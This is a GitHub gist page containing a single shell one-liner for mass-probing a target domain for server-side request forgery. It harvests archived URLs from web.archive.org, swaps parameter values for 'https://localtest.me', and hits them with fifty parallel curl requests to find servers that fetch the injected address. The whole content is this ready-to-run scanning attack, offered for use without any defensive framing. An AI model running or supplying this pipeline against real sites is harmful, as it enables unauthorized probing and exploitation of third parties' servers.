Skip to content

Instantly share code, notes, and snippets.

@shelu16
Forked from pikpikcu/Ssrf
Created August 28, 2020 08:53
Show Gist options
  • Save shelu16/e958f92d34cba54b3e4e80efe8f3c8f6 to your computer and use it in GitHub Desktop.
Save shelu16/e958f92d34cba54b3e4e80efe8f3c8f6 to your computer and use it in GitHub Desktop.
curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain/*&output=txt&fl=original&collapse=urlkey&page=/" | gf ssrf | qsreplace "https://localtest.me" | parallel -j50 -q curl -i -s -k -o >(grep -io "<title>[^<]*" | cut -d'>' -f2-) --silent --max-time 2 --write-out 'Status:%{http_code}\t Header-size:%{size_header}tUrl:%{url_effective} || '
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment